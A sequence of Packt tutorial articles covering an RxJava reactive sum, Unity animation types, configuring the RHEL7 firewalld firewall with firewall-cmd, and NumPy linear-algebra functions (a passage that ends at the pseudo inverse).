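        // Both subscriptions are registered first; nothing has been emitted yet.
        numbers.subscribe(n -> System.out.println("first : " + n));
        numbers.subscribe(n -> System.out.println("second : " + n));

        // Only now does the source start emitting, and both subscribers
        // receive the same three notifications.
        numbers.connect();
    }
}

This is also why the reactive sum calls input.connect() only after a, b, and the ReactiveSum instance have all been wired up.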
Of course, with this main loop, the main thread of the program will block waiting for user input. This can be prevented using the right Scheduler instances to move the logic to another thread. Now, every line the user types into the terminal is propagated as a notification by the ConnectableObservable instance created by this method. The time has come to look at how we connect our value Observable instances, representing the collectors of the sum, to this input Observable instance. Here is the implementation of the varStream(String, Observable) method, which takes the name of a value and a source Observable instance and returns an Observable instance representing this value: public static Observable<Double> varStream(final String varName, Observable<String> input) { final Pattern pattern = Pattern.compile("^\\s*" + varName + "\\s*[:|=]\\s*(-?\\d+\\.?\\d*)$"); // (1) return input .map(new Func1<String, Matcher>() {    public Matcher call(String str) {      return pattern.matcher(str); // (2)    } }) .filter(new Func1<Matcher, Boolean>() {    public Boolean call(Matcher matcher) {      return matcher.matches() && matcher.group(1) != null; // (3)    } }) .map(new Func1<Matcher, Double>() {    public Double call(Matcher matcher) {      return Double.parseDouble(matcher.group(1)); // (4)    } }); } The map() and filter() methods called on the Observable instance here are part of the fluent API provided by RxJava. They can be called on an Observable instance, creating a new Observable instance that depends on these methods and that transforms or filters the incoming data. Using these methods the right way, you can express complex logic in a series of steps leading to your objective: Our variables are interested only in messages in the format <var_name>: <value> or <var_name> = <value>, so we are going to use this regular expression to filter and process only these kinds of messages. Remember that our input Observable instance sends each line the user writes; it is our job to handle it the right way. Using the messages we receive from the input, we create a Matcher instance using the preceding regular expression as a pattern. We pass through only data that matches the regular expression. Everything else is discarded. Here, the value to set is extracted as a Double number value. This is how the values a and b are represented by streams of double values, changing in time. Now we can implement their sum. We implemented it as a class that implements the Observer interface, because I wanted to show you another way of subscribing to Observable instances—using the Observer interface. Here is the code: public static final class ReactiveSum implements Observer<Double> { // (1) private double sum; public ReactiveSum(Observable<Double> a, Observable<Double> b) {    this.sum = 0;    Observable.combineLatest(a, b, new Func2<Double, Double, Double>() { // (5)      public Double call(Double a, Double b) {       return a + b;      }    }).subscribe(this); // (6) } public void onCompleted() {    System.out.println("Exiting last sum was : " + this.sum); // (4) } public void onError(Throwable e) {    System.err.println("Got an error!"); // (3)    e.printStackTrace(); } public void onNext(Double sum) {    this.sum = sum;    System.out.println("update : a + b = " + sum); // (2) } } This is the implementation of the actual sum, dependent on the two Observable instances representing its collectors: It implements the Observer interface. 
The Observer instance can be passed to the Observable instance's subscribe(Observer) method and defines three methods that are named after the three types of notification: onNext(T), onError(Throwable), and onCompleted(). In our onNext(Double) method implementation, we set the sum to the incoming value and print an update to the standard output. If we get an error, we just print it. When everything is done, we greet the user with the final sum. We implement the sum with the combineLatest(Observable, Observable, Func2) method. This method creates a new Observable instance. The new Observable instance is updated when either of the two Observable instances passed to combineLatest receives an update. The value emitted through the new Observable instance is computed by the third parameter—a function that has access to the latest values of the two source sequences. In our case, we sum up the values. There will be no notification until both of the Observable instances passed to the method emit at least one value. So, we will have the sum only when both a and b have notifications. We subscribe our Observer instance to the combined Observable instance. Here is a sample of what the output of this example would look like: Reactive Sum. Type 'a: <number>' and 'b: <number>' to try it. a:4 b:5 update : a + b = 9.0 a:6 update : a + b = 11.0 So this is it! We have implemented our reactive sum using streams of data. Summary In this article, we went through the reactive principles and the reasons we should learn and use them. It is not so hard to build a reactive application; it just requires structuring the program in little declarative steps. With RxJava, this can be accomplished by building multiple asynchronous streams connected the right way, transforming the data all the way to its consumer. The two examples presented in this article may look a bit complex and confusing at first glance, but in reality, they are pretty simple. If you want to read more about reactive programming, take a look at Reactive Programming in the Netflix API with RxJava, a fine article on the topic, available at http://techblog.netflix.com/2013/02/rxjava-netflix-api.html. Another fine post introducing the concept can be found here: https://gist.github.com/staltz/868e7e9bc2a7b8c1f754. And these are slides about reactive programming and Rx by Ben Christensen, one of the creators of RxJava: https://speakerdeck.com/benjchristensen/reactive-programming-with-rx-at-qconsf-2014. Resources for Article: Further resources on this subject: The Observer Pattern [article] The Five Kinds of Python Functions Python 3.4 Edition [article] Discovering Python's parallel programming tools [article]

Animation Fundamentals

Packt
24 Jun 2015
12 min read
In this article by Alan Thorn, author of the book Unity Animation Essentials, you learn the fundamentals of animation. The importance of animation cannot be overstated. Without animation, everything in-game would be statuesque, lifeless, and perhaps boring. This holds true for nearly everything in games: doors must open, characters must move, foliage should sway with the wind, sparkles and particles should explode and shine, and so on. Consequently, learning animation and how to animate properly will unquestionably empower you as a developer, no matter what your career plans are. As a subject, animation creeps unavoidably into most game fields, and it's a critical concern for all members of a team—obviously for artists and animators, but also for programmers, sound designers, and level designers. The aim is to quickly and effectively introduce the fundamental concepts and practices surrounding animation in real-time games, specifically animation in Unity. You will be capable of making effective animations that express your artistic vision, as well as gaining an understanding of how and where you can expand your knowledge to the next level. But to reach that stage, we'll begin with the most basic concepts of animation—the groundwork for any understanding of animation. (For more resources related to this topic, see here.) Understanding animation At its most fundamental level, animation is about a relationship between two specific and separate properties, namely change on one hand and time on the other. Technically, animation defines change over time, that is, how a property adjusts or varies across time, such as how the position of a car changes over time, or how the color of a traffic light transitions over time from red to green. Thus, every animation occurs for a total length of time (duration), and throughout its lifetime, the properties of the objects will change at specific moments (frames), anywhere from the beginning to the end of the animation. This definition is itself technical and somewhat dry, but relevant and important. However, it fails to properly encompass the aesthetic and artistic properties of animation. Through animation and through creative changes in properties over time, moods, atmospheres, worlds, and ideas can be conveyed effectively. Even so, the emotional and artistic power that comes from animation is ultimately a product of the underlying relationship of change with time. Within this framework of change over time, we may identify further key terms, specifically in computer animation. You may already be familiar with these concepts, but let's define them more formally. Frames Within an animation, time must necessarily be divided into separate and discrete units where change can occur. These units are called frames. Time is essentially a continuous and unbreakable quantity, insofar as you can always subdivide time (such as a second) to get an even smaller unit of time (such as a millisecond), and so on. In theory, this process of subdivision could essentially be carried on ad infinitum, resulting in smaller and smaller fractions of time. The concept of a moment or event in time is, by contrast, a human-made, discrete, and self-contained entity. It is a discrete thing that we perceive in time to make our experience of the world more intelligible. Unlike time, a moment is what it is, and it cannot be broken down into something smaller without ceasing to exist altogether. Inside a moment, or a frame, things can happen. 
A frame is an opportunity for properties to change—for doors to open, characters to move, colors to change, and more. In video game animation specifically, each second can sustain or contain a specified number of frames. The amount of frames passing within a second will vary from computer to computer, depending on the hardware capacity, the software installed, and other factors. The frame capacity per second is called FPS (frames per second). It's often used as a measure of performance for a game, since lower frame rates are typically associated with jittery and poor performance. Key frames Although a frame represents an opportunity for change, it doesn't necessarily mean change will occur. Many frames can pass by in a second, and not every frame requires a change. Moreover, even if a change needs to happen for a frame, it would be tedious if animators had to define every frame of action. One of the benefits of computer animation, contrasted with manual, or "old", animation techniques, is that it can make our lives easier. Animators can instead define key, or important, frames within an animation sequence, and then have the computer automatically generate the intervening frames. Consider a simple animation in which a standard bedroom door opens by rotating outwards on its hinges by 90 degrees. The animation begins with the door in the closed position and ends in an open position. Here, we have defined two key states for the door (open and closed), and these states mark the beginning and end of the animation sequence. These are called key frames, because they define key moments within the animation. On the basis of key frames, Unity (as we'll see) can autogenerate the in-between frames (tweens), smoothly rotating the door from its starting frame to its ending frame. The mathematical process of generating tweens is termed as interpolation. Animation types The previous section defined the core concepts underpinning animation generally. Specifically, it covered change, time, frames, key frames, tweens, and interpolation. On the basis of this, we can identify several types of animation in video games from a technical perspective, as opposed to an artistic one. All variations depend on the concepts we've seen, but they do so in different and important ways. These animation types are significant for Unity because the differences in their nature require us to handle and work with them differently, using specific workflows and techniques. The animation types are listed throughout this section, as follows. Rigid body animation Rigid body animation is used to create pre-made animation sequences that move or change the properties of objects, considering those objects as whole or complete entities, as opposed to objects with smaller and moving parts. Some examples of this type of animation are a car racing along the road, a door opening on its hinges, a spaceship flying through space on its trajectory, and a piano falling from the side of a building. Despite the differences among these examples, they all have an important common ingredient. Specifically, although the object changes across key frames, it does so as a single and complete object. In other words, although the door may rotate on its hinges from a closed state to an open state, it still ends the animation as a door, with the same internal structure and composition as before. It doesn't morph into a tiger or a lion. It doesn't explode or turn into jelly. It doesn't melt into rain drops. 
Throughout the animation, the door retains its physical structure. It changes only in terms of its position, rotation and scale. Thus, in rigid body animation, changes across key frames apply to whole objects and their highest level properties. They do not filter down to sub properties and internal components, and they don't change the essence or internal forms of objects. These kinds of animation can be defined either directly in the Unity animation editor, or inside 3D animation software (such as Maya, Max, or Blender) and then imported to Unity through mesh files. Key frame animation for rigid bodies Rigged or bone-based animation If you need to animate human characters, animals, flesh-eating goo, or exploding and deforming objects, then rigid body animation probably won't be enough. You'll need bone-based animation (also called rigged animation). This type of animation changes not the position, rotation, or scale of an object, but the movement and deformation of its internal parts across key frames. It works like this: the animation artist creates a network of special bone objects to approximate the underlying skeleton of a mesh, allowing independent and easy control of the surrounding and internal geometry. This is useful for animating arms, legs, head turns, mouth movements, tree rustling, and a lot more. Typically, bone-based animation is created as a complete animation sequence in 3D modeling software and is imported to Unity inside a mesh file, which can be processed and accessed via Mecanim, the Unity animation system. Bone-based animation is useful for character meshes Sprite animation For 2D games, graphical user interfaces, and a variety of special effects in 3D (such as water textures), you'll sometimes need a standard quad or plane mesh with a texture that animates. In this case, neither the object moves, as with rigid body animation, nor do any of its internal parts change, as with rigged animation. Rather, the texture itself animates. This animation type is called sprite animation. It takes a sequence of images or frames and plays them in order at a specified frame rate to achieve a consistent and animated look, for example, a walk cycle for a character in a 2D side-scrolling game. Physics-based animation In many cases, you can predefine your animation. That is, you can fully plan and create animation sequences for objects that will play in a predetermined way at runtime, such as walk cycles, sequences of door opening, explosions, and others. But sometimes, you need animation that appears realistic and yet responds to its world dynamically, based on decisions made by the player and other variable factors of the world that cannot be predicted ahead of time. There are different ways to handle these scenarios, but one is to use the Unity physics system, which includes components and other data that can be attached to objects to make them behave realistically. Examples of this include falling to the ground under the effects of gravity, and bending and twisting like cloth in the wind. Physics animation Morph animation Occasionally, none of the animation methods you've read so far—rigid body, physics-based, rigged, or sprite animation—give you what's needed. Maybe, you need to morph one thing into another, such as a man into a werewolf, a toad into a princess, or a chocolate bar into a castle. In some instances, you need to blend, or merge smoothly, the state of a mesh in one frame into a different state in a different frame. This is called morph animation, or blend shapes. 
Essentially, this method relies on snapshots of a mesh's vertices across key frames in an animation, and blends between the states via tweens. The downside to this method is its computational expense. It's typically performance intensive, but its results can be impressive and highly realistic. See the following screenshot for the effects of blend shapes: Morph animation start state BlendShapes transition a model from one state to another. See the following figure for the destination state: Morph animation end state Video animation Perhaps one of Unity's lesser known animation features is its ability to play video files as animated textures on desktop platforms and full-screen movies on mobile devices such as iOS and Android devices. Unity accepts OGV (Ogg Theora) videos as assets, and can replay both videos and sounds from these files as an animated texture on mesh objects in the scene. This allows developers to replay pre-rendered video file output from any animation package directly in their games. This feature is powerful and useful, but also performance intensive. Video file animation Particle animation Most animation methods considered so far are for clearly defined, tangible things in a scene, such as sprites and meshes. These are objects with clearly marked boundaries that separate them from other things. But you'll frequently need to animate less tangible, less solid, and less physical matter, such as smoke, fire, bubbles, sparkles, smog, swarms, fireworks, clouds, and others. For these purposes, a particle system is indispensable. Particle systems are entirely configurable objects that can be used to simulate rain, snow, flock of birds, and more. See the following screenshot for a particle system in action: Particle system animation Programmatic animation Surprisingly, the most common animation type is perhaps programmatic animation, or dynamic animation. If you need a spaceship to fly across the screen, a user-controlled character to move around an environment, or a door to open when approached, you'll probably need some programmatic animation. This refers to changes made to properties in objects over time, which arise because of programming—code that a developer has written specifically for that purpose. Unlike many other forms of animation, the programmatic form is not created or built in advance by an artist or animator per se, because its permutations and combinations cannot be known upfront. So, it's coded by a programmer and has the flexibility to change and adjust according to conditions and variables at runtime. Of course, in many cases, animations are made by artists and animators and the code simply triggers or guides the animation at runtime. Summary This article considered animation abstractly, as a form of art, and as a science. We covered the types of animation that are most common in Unity games. In addition, we examined some core tasks and ideas in programmatic animation, including the ability to animate and change objects dynamically through code without relying on pre-scripted or predefined animations, which will engross you in much of this article. Resources for Article: Further resources on this subject: Saying Hello to Unity and Android [article] Looking Back, Looking Forward [article] What's Your Input? [article]

Securing Your Network using firewalld

Packt
23 Jun 2015
13 min read
In this article by Andrew Mallett, author of the book Learning RHEL Networking, we see how to secure our network using the firewall daemon, that is, firewalld. The default user interface for netfilter, the kernel-based firewall, on RHEL7 is firewalld. Administrators now have a choice to use firewalld or iptables to manage firewalls. Underlying either process, we can still implement the kernel-based netfilter firewall. The frontend command to this new interface is firewall-cmd. The main benefit this offers is the ability to refresh the netfilter setting while the firewall is running. This is not possible with the iptables interface; additionally, we are able to use zone management. This enables us to have different firewall configurations, depending on the network we are connected to. In this article, we will cover the following topics: The firewall status Routing The zone management The source management Firewall rules using services Firewall rules using ports Masquerading and the network address translation Using rich rules Implementing direct rules Reverting to iptables (For more resources related to this topic, see here.) The firewall status The firewall service can provide protection for your RHEL system and services from other hosts on the local network or Internet. Although firewalling is often maintained on the border routers to your network, additional protection can be provided by host-based firewalls, such as the netfilter firewall on the Linux kernel. The netfilter firewall on RHEL 7 can be implemented via the iptables or firewalld service, with the latter being the default. The status of the firewalld service can be interrogated in a normal manner using the systemctl command. This will provide a verbose output if the service is running. This will include the PID (process ID) of firewalld along with recent log messages. The following is a command from RHEL7.1: # systemctl status firewalld If you just need a quick check with a less verbose output, make use of the firewall-cmd command. This is the main administrative tool used to manage firewalld. If firewalld was not active, the output would show as not running. Routing Although not strictly necessary for a firewall, you may need to implement routing on your RHEL7 system. Often, this will be associated with multi-homed systems with more than one network interface card; however, this is not a requirement of network routing, which allows packets to be forwarded to the correct destination network. Network routing is enabled in procfs in the /proc/sys/net/ipv4/ip_forward file. If this file contains a value of 0, then routing is disabled; if it has a value of 1, routing is enabled. This can be set using the echo command as follows: # echo 1 > /proc/sys/net/ipv4/ip_forward However, this only turns routing on until the next reboot, when it will revert to the configured setting. Traditionally, the /etc/sysctl.conf file has been used to make this setting permanent. It's now recommended to add your own configurations to /etc/sysctl.d/. Here is an example of this: # echo "net.ipv4.ip_forward = 1" > /etc/sysctl.d/ipforward.conf This will create a file and set its directive. To make this setting effective prior to the next reboot, we can make use of the sysctl command, as shown in the following command: # sysctl -p /etc/sysctl.d/ipforward.conf Zone management A new feature you will find in firewalld that is more aimed at mobile systems—such as laptops—is the inclusion of zones. 
However, these zones can be equally used on a multihomed system, which associates different NICs with appropriate zones. Using zones in either mobile or multihomed systems, firewall rules can be assigned to zones and these rules will be associated with NICs included in that zone. If an interface is not assigned explicitly to a zone, then it will become a part of the default zone. To interrogate the default zone on your system, we can use the firewall-cmd command, as shown in the following command line: # firewall-cmd --get-default-zone Should you need to list all the configured zones on your system, the following command can be used: # firewall-cmd --get-zones Perhaps more usefully, we can display zones with interfaces assigned to them; if no assignments have been made, then all the interfaces will be in the public zone. The --get-active-zones option will help us with this, as shown in the following command: # firewall-cmd --get-active-zones Should we require a more verbose output, we can list all the zone names, associated rules, and interfaces. The following command demonstrates how this can be achieved: # firewall-cmd --list-all-zones If you need to utilize zones, you can choose the default zone and assign interfaces to specific zones as well. Firstly, assign a new default zone as follows: # firewall-cmd --set-default-zone=work Here, we redirect the default zone to the work zone. In this way, all NICs that have not been explicitly assigned will participate in the work zone. The preceding command should report back with success. We can also explicitly assign a zone to an interface as follows: # firewall-cmd --zone=public --change-interface=eno16777736 The change made through this command will be temporary until the next reboot; to make it permanent, we will add the --permanent option: # firewall-cmd --zone=public --change-interface=eno16777736 --permanent Making a setting permanent will persist the configuration within the zone file located in the /etc/firewalld/zones/ directory. In our case, the file is /etc/firewalld/zones/public.xml. After having implemented the permanent change as detailed here, we can list the contents of the XML file with the cat command. We can either interrogate an individual NIC to view the zone it's associated with or list all interfaces within a zone; the following commands illustrate this: # firewall-cmd --get-zone-of-interface=eno16777736 # firewall-cmd --zone=public --list-all You can use tab completion to assist with options and arguments with firewall-cmd. If the supplied zones are not ample or perhaps the names do not work for your naming schemes, it's possible to create your own zones and add interfaces and rules. After adding your zone, you can reload the configuration to allow it to be used immediately as follows: # firewall-cmd --permanent --new-zone=packt # firewall-cmd --reload The --reload option can reload the configuration that allows current connections to continue uninterrupted; whereas the --complete-reload option will stop all connections during the process. Source management The problem that you may encounter using interfaces assigned to your zones is that it does not differentiate between network addresses. Often, this is not an issue as only one network address is bound to the NIC; however, if you have more than one address bound to the NIC, you may want to implement the firewalld source. Like interfaces, sources can be assigned to zones. 
In the following command, we will add a network range to the trusted zone and another range, perhaps on the same NIC, to the public zone: # firewall-cmd --permanent --zone=trusted --add-source=192.168.1.0/24 # firewall-cmd --permanent --zone=public --add-source=172.17.0.0/16 Similar to interfaces, binding a source to a zone will activate that zone and will be listed with the --get-active-zones option. Firewall rules using services When we think of firewalls, we think of allowing or denying access to ports. The use of service XML files can ease port management, with one service perhaps listing multiple ports. The other point to take note of is that the firewalld daemon's default policy is to deny access, so any access needed has to be explicitly granted to a port associated with a service. To list services that have been allowed on the default zone, we can simply use the --list-services option, as shown in the following example: # firewall-cmd --list-services Similarly, we can list the services allowed in a specific zone by including the --zone= option. This can be seen in the following example: # firewall-cmd --zone=home --list-services As you start enabling services, you can easily allow a predefined service through a zone. Predefined services are listed as XML files in the /usr/lib/firewalld/services directory. RHEL 7 is representative of a more mature Linux distribution; as such, it recognizes that the need to separate the /usr directory from the root filesystem is deprecated, and the /lib, /bin, and /sbin directories are soft-linked to their respective directories under /usr/. Hence, /lib is now the same as /usr/lib. While defining your own services, you may create XML files within the /etc/firewalld/services directory. The squid proxy server does not have its own service file, and if we choose to allow this as a service rather than just opening the required port, the file would look similar to /etc/firewalld/services/squid.xml, as follows: <?xml version="1.0" encoding="utf-8"?> <service> <short>Squid</short> <description>Squid Web Proxy</description> <port protocol="tcp" port="3128"/> </service> Assuming that we are using SELinux in the Enforcing mode, we will need to set the correct context for the new file using the following commands: # cd /etc/firewalld/services # restorecon squid.xml The permissions on this file should be 640, and they can be set using the following command: # chmod 640 /etc/firewalld/services/squid.xml Having defined the new service, or using pre-existing services, we can add them to a zone. If we are using the default zone, this is achieved simply with the following commands. Note that we reload the configuration at the start to identify the new squid service as follows: # firewall-cmd --reload # firewall-cmd --permanent --add-service=squid # firewall-cmd --reload Similarly, to update a specified zone other than the default zone, we will use the following commands: # firewall-cmd --permanent --add-service=squid --zone=work # firewall-cmd --reload Should we later need to remove this service from the work zone, we can use the following command: # firewall-cmd --permanent --remove-service=squid --zone=work # firewall-cmd --reload Firewall rules using ports In the previous example, where the squid service only required a single port, we could easily add a port rule to allow access to a service. 
Although the process is simple, in some organizations, the preference will still be to create the service file that documents the need of the port in the description field. If we need to add a port, we have similar options in --add-port and --remove-port. The following command shows how to add the squid TCP port 3128 to the work zone without the need to define the service file: # firewall-cmd --permanent --add-port=3128/tcp --zone=work # firewall-cmd --reload Masquerading and Network Address Translation If your firewalld server is your network router running RHEL 7, you may wish to provide access to the Internet to your internal hosts on a private network. If this is the case, we can enable masquerading. This is also known as NAT (Network Address Translation), where the server's public IP address is used by internal clients. To establish this, we can make use of the built-in internal and external zones and configure masquerading on the external zone. The internal NIC should be assigned to the internal zone and the external NIC should be assigned to the external zone. To establish masquerading on the external zone, we can use the following command: # firewall-cmd --zone=external --add-masquerade Masquerading is removed using the --remove-masquerade option. We may also query the status of masquerading in a zone using the --query-masquerade option. Using rich rules The firewalld rich language allows an administrator to easily configure more complex firewall rules without having knowledge of the iptables syntax. This can include logging and examination of the source address. To add a rule to allow NTP connection on the default zone, but logging the connection at no more than 1 per minute, use the following command: # firewall-cmd --permanent --add-rich-rule='rule service name="ntp" audit limit value="1/m" accept' # firewall-cmd --reload Similarly, we can add a rule that only allows access to the squid service from one subnet only: # firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.166.0.0/24" service name="squid" accept' # firewall-cmd --reload The Fedora project maintains the documentation for rich rules in firewalld and these can be accessed at https://fedoraproject.org/wiki/Features/FirewalldRichLanguage should you need more detailed examples. Implementing direct rules If you have a prior experience with iptables and want to combine you knowledge of iptables with the features in firewalld, direct rules are here to help with this migration. Firstly, if we want to implement a rule on the INPUT chain, we can check the current settings with the following command: # firewall-cmd --direct --get-rules ipv4 filter INPUT If you have not added any rules, the output will be empty. We will add a new rule and use a priority of 0. This means that it will be listed at the top of the chain; however, this means little when no other rules are in place. We do need to verify that rules are added in the correct order to process if other rules are implemented: # firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT 0 -p tcp --dport 3128 -j ACCEPT # firewall-cmd --reload Reverting to iptables Additionally, there is nothing stopping you from using the iptables service if this is what you are most familiar with. 
Firstly, we can install iptables with the following command: # yum install iptables-service We can mask the firewalld service to more effectively disable the service, preventing it from being started without first unmasking this service: # systemctl mask firewalld We can enable iptables with the following commands: # systemctl enable iptables # systemctl enable ip6tables # systemctl start iptables # systemctl start ip6tables Permanent rules are added as they always have been, via the /etc/sysconfig directory and the iptables and ip6tables files. The firewalld project is maintained by Fedora and is the new administrative service and interface for the netfilter firewall on the Linux kernel. As administrators, we can choose to use this default service or switch back to iptables; however, firewalld provides us with the ability to reload the configuration without dropping connections, as well as mechanisms to migrate from iptables. We have seen how we can use zones to segregate network interfaces and sources if we need to share address ranges on a single NIC. Either the NIC or the source can be bound to the zone. We can then add rules to a zone to control access to our resources. These rules are based on services or ports. If more complexity is required, we have the option of using rich or direct rules. Rich rules are written in the rich language from firewalld, whereas direct rules are written in the iptables syntax. Summary In this article, you learned how to secure your network using firewalld. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Managing public and private groups [article] Target Exploitation [article]

Moving Further with NumPy Modules

Packt
23 Jun 2015
23 min read
NumPy has a number of modules inherited from its predecessor, Numeric. Some of these packages have a SciPy counterpart, which may have fuller functionality. In this article by Ivan Idris, author of the book NumPy: Beginner's Guide - Third Edition, we will cover the following topics: The linalg package The fft package Random numbers Continuous and discrete distributions (For more resources related to this topic, see here.) Linear algebra Linear algebra is an important branch of mathematics. The numpy.linalg package contains linear algebra functions. With this module, you can invert matrices, calculate eigenvalues, solve linear equations, and determine determinants, among other things (see http://docs.scipy.org/doc/numpy/reference/routines.linalg.html). Time for action – inverting matrices The inverse of a matrix A in linear algebra is the matrix A⁻¹, which, when multiplied with the original matrix, is equal to the identity matrix I. This can be written as follows: A A⁻¹ = I The inv() function in the numpy.linalg package can invert an example matrix with the following steps: Create the example matrix with the mat() function: A = np.mat("0 1 2;1 0 3;4 -3 8") print("A\n", A) The A matrix appears as follows: A [[ 0 1 2] [ 1 0 3] [ 4 -3 8]] Invert the matrix with the inv() function: inverse = np.linalg.inv(A) print("inverse of A\n", inverse) The inverse matrix appears as follows: inverse of A [[-4.5 7. -1.5] [-2.   4. -1. ] [ 1.5 -2.   0.5]] If the matrix is singular, or not square, a LinAlgError is raised. If you want, you can check the result manually with a pen and paper. This is left as an exercise for the reader. Check the result by multiplying the original matrix with the result of the inv() function: print("Check\n", A * inverse) The result is the identity matrix, as expected: Check [[ 1. 0. 0.] [ 0. 1. 0.] [ 0. 0. 1.]] What just happened? We calculated the inverse of a matrix with the inv() function of the numpy.linalg package. We checked, with matrix multiplication, whether this is indeed the inverse matrix (see inversion.py): from __future__ import print_function import numpy as np   A = np.mat("0 1 2;1 0 3;4 -3 8") print("A\n", A)   inverse = np.linalg.inv(A) print("inverse of A\n", inverse)   print("Check\n", A * inverse) Pop quiz – creating a matrix Q1. Which function can create matrices? array create_matrix mat vector Have a go hero – inverting your own matrix Create your own matrix and invert it. The inverse is only defined for square matrices. The matrix must be square and invertible; otherwise, a LinAlgError exception is raised. Solving linear systems A matrix transforms a vector into another vector in a linear way. This transformation mathematically corresponds to a system of linear equations. The numpy.linalg function solve() solves systems of linear equations of the form Ax = b, where A is a matrix, b can be a one-dimensional or two-dimensional array, and x is an unknown variable. We will see the dot() function in action. This function returns the dot product of two floating-point arrays. The dot() function calculates the dot product (see https://www.khanacademy.org/math/linear-algebra/vectors_and_spaces/dot_cross_products/v/vector-dot-product-and-vector-length). 
For a matrix A and vector b, the dot product is equal to the following sum: (A · b)_i = Σ_j a_ij * b_j Time for action – solving a linear system Solve an example of a linear system with the following steps: Create A and b: A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("A\n", A) b = np.array([0, 8, -9]) print("b\n", b) A and b appear as follows: A [[ 1 -2 1] [ 0 2 -8] [-4 5 9]] b [ 0 8 -9] Solve this linear system with the solve() function: x = np.linalg.solve(A, b) print("Solution", x) The solution of the linear system is as follows: Solution [ 29. 16.   3.] Check whether the solution is correct with the dot() function: print("Check\n", np.dot(A , x)) The result is as expected: Check [[ 0. 8. -9.]] What just happened? We solved a linear system using the solve() function from the NumPy linalg module and checked the solution with the dot() function: from __future__ import print_function import numpy as np   A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("A\n", A)   b = np.array([0, 8, -9]) print("b\n", b)   x = np.linalg.solve(A, b) print("Solution", x)   print("Check\n", np.dot(A , x)) Finding eigenvalues and eigenvectors Eigenvalues are scalar solutions to the equation Ax = ax, where A is a two-dimensional matrix and x is a one-dimensional vector. Eigenvectors are vectors corresponding to eigenvalues (see https://www.khanacademy.org/math/linear-algebra/alternate_bases/eigen_everything/v/linear-algebra-introduction-to-eigenvalues-and-eigenvectors). The eigvals() function in the numpy.linalg package calculates eigenvalues. The eig() function returns a tuple containing eigenvalues and eigenvectors. Time for action – determining eigenvalues and eigenvectors Let's calculate the eigenvalues of a matrix: Create a matrix as shown in the following: A = np.mat("3 -2;1 0") print("A\n", A) The matrix we created looks like the following: A [[ 3 -2] [ 1 0]] Call the eigvals() function: print("Eigenvalues", np.linalg.eigvals(A)) The eigenvalues of the matrix are as follows: Eigenvalues [ 2. 1.] Determine eigenvalues and eigenvectors with the eig() function. This function returns a tuple, where the first element contains eigenvalues and the second element contains corresponding eigenvectors, arranged column-wise: eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eig\n", eigenvectors) The eigenvalues and eigenvectors appear as follows: First tuple of eig [ 2. 1.] Second tuple of eig [[ 0.89442719 0.70710678] [ 0.4472136   0.70710678]] Check the result with the dot() function by calculating the right and left side of the eigenvalues equation Ax = ax: for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() The output is as follows: Left [[ 1.78885438] [ 0.89442719]] Right [[ 1.78885438] [ 0.89442719]] What just happened? We found the eigenvalues and eigenvectors of a matrix with the eigvals() and eig() functions of the numpy.linalg module. 
We checked the result using the dot() function (see eigenvalues.py): from __future__ import print_function import numpy as np   A = np.mat("3 -2;1 0") print("A\n", A)   print("Eigenvalues", np.linalg.eigvals(A) )   eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eig\n", eigenvectors)   for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() Singular value decomposition Singular value decomposition (SVD) is a type of factorization that decomposes a matrix into a product of three matrices. The SVD is a generalization of the previously discussed eigenvalue decomposition. SVD is very useful for algorithms such as the pseudo inverse, which we will discuss in the next section. The svd() function in the numpy.linalg package can perform this decomposition. This function returns three matrices U, Σ, and V such that U and V are unitary and Σ contains the singular values of the input matrix: A = U Σ V* The asterisk denotes the Hermitian conjugate or the conjugate transpose. The complex conjugate changes the sign of the imaginary part of a complex number and is therefore not relevant for real numbers. A complex square matrix A is unitary if A*A = AA* = I (the identity matrix). We can interpret SVD as a sequence of three operations—rotation, scaling, and another rotation. We already transposed matrices in this article. The transpose flips matrices, turning rows into columns, and columns into rows. Time for action – decomposing a matrix It's time to decompose a matrix with the SVD using the following steps: First, create a matrix as shown in the following: A = np.mat("4 11 14;8 7 -2") print("A\n", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Decompose the matrix with the svd() function: U, Sigma, V = np.linalg.svd(A, full_matrices=False) print("U") print(U) print("Sigma") print(Sigma) print("V") print(V) Because of the full_matrices=False specification, NumPy performs a reduced SVD decomposition, which is faster to compute. The result is a tuple containing the two unitary matrices U and V on the left and right, respectively, and the singular values of the middle matrix: U [[-0.9486833 -0.31622777]   [-0.31622777 0.9486833 ]] Sigma [ 18.97366596   9.48683298] V [[-0.33333333 -0.66666667 -0.66666667] [ 0.66666667 0.33333333 -0.66666667]] We do not actually have the middle matrix—we only have the diagonal values. The other values are all 0. Form the middle matrix with the diag() function. Multiply the three matrices as follows: print("Product\n", U * np.diag(Sigma) * V) The product of the three matrices is equal to the matrix we created in the first step: Product [[ 4. 11. 14.] [ 8.   7. -2.]] What just happened? We decomposed a matrix and checked the result by matrix multiplication. We used the svd() function from the NumPy linalg module (see decomposition.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("A\n", A)   U, Sigma, V = np.linalg.svd(A, full_matrices=False)   print("U") print(U)   print("Sigma") print(Sigma)   print("V") print(V)   print("Product\n", U * np.diag(Sigma) * V) Pseudo inverse The Moore-Penrose pseudo inverse of a matrix can be computed with the pinv() function of the numpy.linalg module (see http://en.wikipedia.org/wiki/Moore%E2%80%93Penrose_pseudoinverse). The pseudo inverse is calculated using the SVD (see previous example). 
